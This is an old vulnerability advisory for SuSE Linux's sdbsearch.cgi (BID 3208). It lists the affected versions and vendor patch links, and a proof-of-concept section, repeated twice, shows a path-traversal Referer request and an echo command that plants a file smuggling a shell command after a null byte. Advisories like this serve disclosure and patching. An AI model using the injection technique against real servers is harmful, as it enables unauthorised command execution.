SuSE sdb Arbitrary Command Execution Vulnerability
BID:3208
Info
SuSE sdb Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 3208 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 02 2001 12:00AM |
| Updated: | Aug 02 2001 12:00AM |
| Credit: | Reported by Maurycy Prodeus <[email protected]> on August 2, 2001. |
| Vulnerable: |
SuSE Linux 7.0 SuSE Linux 6.4 SuSE Linux 6.3 |
| Not Vulnerable: |
SuSE Linux 7.2 SuSE Linux 7.1 |
Exploit / POC
SuSE sdb Arbitrary Command Execution Vulnerability
An example was provided by Maurycy Prodeus <[email protected]>:
Proof of concept is very simple, just create harmful keylist.txt for instance in /tmp directory and send request to http server like this:
GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
(very deep traversal because we don't know what is DOCUMENT_ROOT)
and an example content of our /tmp/keylist.txt create like this:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt
After successful attempt there will be "exploitable" file in /tmp directory.
An example was provided by Maurycy Prodeus <[email protected]>:
Proof of concept is very simple, just create harmful keylist.txt for instance in /tmp directory and send request to http server like this:
GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
(very deep traversal because we don't know what is DOCUMENT_ROOT)
and an example content of our /tmp/keylist.txt create like this:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt
After successful attempt there will be "exploitable" file in /tmp directory.
Solution / Fix
SuSE sdb Arbitrary Command Execution Vulnerability
Solution:
Updates that rectify this issue are available from the vendor:
SuSE Linux 6.3
SuSE Linux 6.4
SuSE Linux 7.0
Solution:
Updates that rectify this issue are available from the vendor:
SuSE Linux 6.3
-
S.u.S.E. 6.3 alpha sdb-99.11.8-2.noarch.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.3/doc1/sdb-99.11.8-2.noarch.r pm -
S.u.S.E. 6.3 i386 sdb-99.11.8-10.noarch.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.3/doc1/sdb-99.11.8-10.noarch .rpm
SuSE Linux 6.4
-
S.u.S.E. 6.4 alpha sdb-2000.3.13-0.noarch.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.4/doc1/sdb-2000.3.13-0.noarch .rpm -
S.u.S.E. 6.4 i386 sdb-2000.3.13-1.noarch.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.4/doc1/sdb-2000.3.13-1.noarc h.rpm -
S.u.S.E. 6.4 ppc sdb-2000.3.13-0.noarch.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/6.4/doc1/sdb-2000.3.13-0.noarch .rpm
SuSE Linux 7.0
-
S.u.S.E. 7.0 alpha sdb-2000.7.14-0.noarch.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.0/doc1/sdb-2000.7.14-0.noarch .rpm -
S.u.S.E. 7.0 i386 sdb-2000.7.14-3.noarch.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.0/doc1/sdb-2000.7.14-3.noarc h.rpm -
S.u.S.E. 7.0 ppc sdb-2000.7.14-0.noarch.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.0/doc1/sdb-2000.7.14-0.noarch .rpm -
S.u.S.E. 7.0 sparc sdb-2000.7.14-0.noarch.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/doc1/sdb-2000.7.14-0.noar ch.rpm